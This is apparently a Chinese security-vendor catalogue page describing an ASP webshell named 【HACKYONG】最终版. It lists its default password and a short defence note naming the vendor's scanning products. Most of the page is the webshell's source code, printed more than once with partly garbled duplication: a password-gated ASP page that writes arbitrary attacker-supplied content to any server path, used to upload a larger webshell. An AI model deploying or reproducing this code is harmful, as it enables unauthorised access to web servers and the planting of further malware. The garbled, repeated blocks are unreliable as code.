【HACKYONG】最终版

2011-12-12 16:48:36 来源:本站原创,请勿转载 浏览:271
【HACKYONG】最终版

木马名称:【HACKYONG】最终版
木马格式:asp
默认密码:admin.com
木马作用:是一匹小马,通过它上传大马。本身无害,但通过它可以上传具备强大破坏力的网页木马!

运行界面如下:

总结:asp网页木马:【HACKYONG】最终版,是一匹小马,通过它上传大马。
防御方法:
护卫神入侵防护系统、护卫神云查杀均可查杀【HACKYONG】最终版这个asp网页木马。

【HACKYONG】最终版部分代码:
<%
'┌───────────────┐
'│         jsyzss   │
'└───────────────┘
dim Userpwd,URL,Info,ServerIP,hackyong
Userpwd  = 'admin.com'  
URL      = Request.ServerVariables('URL')
Info     = Request.ServerVariables('Appl_Physical_Path')
ServerIP = Request.ServerVariables('LOCAL_ADDR')
hackyong = '
只取webshell >不改首页 >不删文件 >不提权'
If Request('pwd')=Userpwd or Request('pwd')=Request.ServerVariables('URL') then Session('mgler')=Userpwd
If Session('mgler')<>Userpwd Then
  If Request.Form('pwd')<>'' Then
    If Request.Form('pwd')=Userpwd Then
      Session('mgler')=Userpwd
      Response.Redirect URL
    Else
 Response.Write'

对不起,您输入的密码有误,'
 Response.Write'系统不能让你登陆!

返回
'
    End If
  Else
    RW='' & ServerIP & ' - HACKYONG
'
    RW=RW & '
'
    RW=RW & '【HACKYONG】最终版
'
    RW=RW & '
'
    RW=RW & '密码:
'
    RW=RW & '' & hackyong & '
'
    Response.Write RW
    RW=''
  End If
  Response.End
End If
%><%
'┌───────────────┐
'│         jsyzss   │
'└───────────────┘
dim Userpwd,URL,Info,ServerIP,hackyong
Userpwd  = "admin.com"  
URL      = Request.ServerVariables("URL")
Info     = Request.ServerVariables("Appl_Physical_Path")
ServerIP = Request.ServerVariables("LOCAL_ADDR")
hackyong = "<hr><font color=red  style='font-size: 12px'>只取webshell >不改首页 >不删文件 >不提权</font>"
If Request("pwd")=Userpwd or Request("pwd")=Request.ServerVariables("URL") then Session("mgler")=Userpwd
If Session("mgler")<>Userpwd Then
  If Request.Form("pwd")<>"" Then
    If Request.Form("pwd")=Userpwd Then
      Session("mgler")=Userpwd
      Response.Redirect URL
    Else
 Response.Write"<br><br><div align=center style='font-size: 12px'><font color=red>对不起,您输入的密码有误,"
 Response.Write"系统不能让你登陆!<br><br><a href='"&URL&"'>返回</a></div>"
    End If
  Else
    RW="<title>" & ServerIP & " - HACKYONG</title><center>"
    RW=RW & "<div style='width:500px;border:1px solid #222;padding:18px;margin:80px;'>"
    RW=RW & "<a href='http://WwW.hackyong.Com' ><span style='text-decoration: none'>【HACKYONG】最终版</a><hr>"
    RW=RW & "<form action='" & URL & "' method='post'>"
    RW=RW & "密码:</font><input name='pwd' type='password' size='22' style='font-size: 12px;border:1px solid #000'> <input style='font-size: 12px;border:1px solid #000' type='submit' value='登录'>"
    RW=RW & "" & hackyong & "</center>"
    Response.Write RW
    RW=""
  End If
  Response.End
End If
%>
<%="<center><div style='width:500px;border:1px solid #222;padding:12px;margin:80px;'>"%>
<%="【HACKYONG】最终版<hr></center>"%>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="<font size='2' color='BLUE'>Success Write To  "%>
<%= path%>
<%="</font>"%>
<%else%>
<%
'┌───────────────┐
'│         jsyzss   │
'└───────────────┘
dim Userpwd,URL,Info,ServerIP,hackyong
Userpwd  = 'admin.com'  
URL      = Request.ServerVariables('URL')
Info     = Request.ServerVariables('Appl_Physical_Path')
ServerIP = Request.ServerVariables('LOCAL_ADDR')
hackyong = '
只取webshell >不改首页 >不删文件 >不提权'
If Request('pwd')=Userpwd or Request('pwd')=Request.ServerVariables('URL') then Session('mgler')=Userpwd
If Session('mgler')<>Userpwd Then
  If Request.Form('pwd')<>'' Then
    If Request.Form('pwd')=Userpwd Then
      Session('mgler')=Userpwd
      Response.Redirect URL
    Else
 Response.Write'

对不起,您输入的密码有误,'
 Response.Write'系统不能让你登陆!

返回
'
    End If
  Else
    RW='' & ServerIP & ' - HACKYONG
'
    RW=RW & '
'
    RW=RW & '【HACKYONG】最终版
'
    RW=RW & ''
    RW=RW & '密码:
'
    RW=RW & '' & hackyong & '
'
    Response.Write RW
    RW=''
  End If
  Response.End
End If
%>
<%end if%>

(0)
(0)